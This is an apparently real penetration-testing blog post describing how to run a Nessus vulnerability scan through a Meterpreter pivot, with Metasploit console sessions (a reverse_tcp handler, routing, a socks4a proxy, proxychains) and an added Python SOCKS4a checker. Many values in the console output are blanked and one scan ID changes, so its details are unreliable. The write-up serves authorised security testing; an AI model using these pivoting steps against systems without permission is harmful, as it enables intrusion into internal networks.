Earlier this year Mark Baggett wrote an article on running a Nessus scan through Meterpreter. It involved installing an SSH server on the compromised machine and then using it as a SOCKS4 proxy to forward the scan traffic through to the target machine (Nessus Scanning through a Metasploit Meterpreter Session). It was a great idea, but I don't like installing tools on clients' machines if I can avoid it, so I never got round to doing it on a test.
Recently Zate Berg added the Nessus plug-in to Metasploit to let you control a Nessus server from the Metasploit command line. Without thinking it through, my initial reaction was "Great, I can now scan through a Meterpreter pivot". Once I thought about it and read Carlos's article New Nessus Plug-In For Metasploit I realised that the Nessus server was still running on the attacker machine and so didn't have access to the tunnel.
After asking a few questions on various mailing lists, egypt pointed me at the auxiliary/server/socks4a module, which would allow me to do the same as the SSH server but without having to install anything on the compromised machine. After a bit of playing, some partially successful scans and more questions to the list, I got a completed scan through a Meterpreter pivot. The key seems to be that you need to be running at least Ruby (I'm running ), not as I originally tried; without it the proxy seems to get congested and locks up.
Below is a walk-through of the steps I went through to get the scan. The actors in this play are:
- - The attacking machine
- - The compromised machine
- - The machine I want to scan
First set up the handler, catch the Meterpreter session, add the route and start the SOCKS proxy:

robin@attacker metasploit $ ./msfconsole
 ___________
< DigiNinja >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

       =[ metasploit v-dev [core: api:]
+ -- --=[ exploits - auxiliary
+ -- --=[ payloads - encoders - nops
       =[ svn r updated today ()

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport
lport =>
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage ( bytes) to
[*] Meterpreter session opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +
msf exploit(handler) > route add
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >

Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.

Check the tunnel is working. Pick a port you know, or expect, to be open on the target machine; SMB is usually a good choice for a Windows box. I don't speak SMB, but if you do this and see the OK then the connection has been made, and you can just enter some rubbish and hit return a few times; the other end will drop the connection pretty quickly.

root@attacker sbin # proxychains nc
ProxyChains- (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy
...
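The same tunnel check done by hand, as an added example that is not part of the original post: instead of proxychains and nc it speaks SOCKS4a directly to the Metasploit listener on 127.0.0.1:1080 (the hop shown in the proxychains chain output) and asks it to CONNECT to a target host and port of your choosing. It goes slightly beyond the nc check by also accepting a hostname, which SOCKS4a resolves on the proxy side, i.e. through the pivot. A granted reply (code 90) means the pivot reached the port; a rejection or a short reply is what a refused port or a congested proxy looks like from the client side.

```python
import socket
import struct

# The Metasploit auxiliary/server/socks4a listener, as shown in the proxychains chain output.
PROXY_HOST, PROXY_PORT = "127.0.0.1", 1080


def build_socks4a_request(host: str, port: int, userid: str = "") -> bytes:
    """Build a SOCKS4 (IPv4 literal) or SOCKS4a (hostname) CONNECT request.

    Layout: VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID NUL [, HOSTNAME NUL].
    For SOCKS4a the DSTIP is 0.0.0.1 and the hostname follows, so the name is
    resolved by the proxy, i.e. through the pivot, not on the attacking machine.
    """
    try:
        dst_ip = socket.inet_aton(host)      # dotted IPv4: plain SOCKS4 request
        trailer = b""
    except OSError:
        dst_ip = b"\x00\x00\x00\x01"         # SOCKS4a marker: resolve on the proxy
        trailer = host.encode() + b"\x00"
    return struct.pack("!BBH4s", 4, 1, port, dst_ip) + userid.encode() + b"\x00" + trailer


def parse_socks4_reply(reply: bytes) -> bool:
    """Return True only for a granted CONNECT (VN=0, CD=90).

    CD 91-93 are rejections; a short or empty reply is what a congested or
    locked-up proxy looks like from the client side, so it also counts as failure.
    """
    return len(reply) >= 8 and reply[0] == 0 and reply[1] == 90


def check_pivot(host: str, port: int, timeout: float = 10.0) -> bool:
    """Ask the socks4a proxy to CONNECT to host:port; True means the pivot reached it."""
    with socket.create_connection((PROXY_HOST, PROXY_PORT), timeout=timeout) as s:
        s.sendall(build_socks4a_request(host, port))
        return parse_socks4_reply(s.recv(8))


if __name__ == "__main__":
    # Usage: python socks4a_check.py <target host> <port>, e.g. the SMB port on a Windows box
    import sys
    target, target_port = sys.argv[1], int(sys.argv[2])
    print("OK" if check_pivot(target, target_port) else "FAILED")
```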
And now start Nessus, again through proxychains so that its scan traffic goes into the tunnel.

root@attacker sbin # proxychains ./nessus-service -D

Scans take a LONG time; with a default Nessus policy it took me seconds to scan the compromised machine, that is nearly an hour and a quarter, so I've created a minimal policy to work with for this type of scanning. First we load the nessus module, then connect to it, check the policies and finally fire off a scan.

msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus .x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List

ID  Name       Comments
--  ----       --------
    Minimal
    MS noping
    Web
    All

msf auxiliary(socks4a) > nessus_scan_new  "Quick Windows"
[*] Creating scan from policy number , called "Quick Windows" and scanning
[*] Scan started.  uid is 60625093-5ec-a-bc-afffaadbfaaee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                          Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                          ----           -----  -------            ------   -------------  -----------
60625093-5ec-a-bc-afffaadbfaaee  Quick Windows  robin  12:39 Oct 22 2010  running                 1

[*] You can:
[+]   Import Nessus report to database : nessus_report_get <reportid>
[+]   Pause a nessus scan : nessus_scan_pause <scanid>

Now sit back for a LONG wait. You can check the status with nessus_scan_status.

msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                          Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                          ----           -----  -------            ------   -------------  -----------
60625093-5ec-a-bc-afffaadbfaaee  Quick Windows  robin  12:39 Oct 22 2010  running                 1

When it finally finishes you can check the results and load them into your Metasploit database.

msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf auxiliary(socks4a) > nessus_report_get 60625093-5ec-a-bc-af19ffaadbfaaee
[*] importing 60625093-5ec-a-bc-af19ffaadbfaaee
[*] Done!
[+] Done
msf auxiliary(socks4a) > db_hosts

Hosts
=====

address  address6  arch  comm  comments  created_at               info  mac                name     os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------  --------  ----  ----  --------  ----------               ----  ---                ----     ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------
                                         2010-10-22 14:09:22 UTC        00:13:3b:04:03:52  CORP_DC                                             alive  2010-10-22 14:09:22 UTC  5     6      default

So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.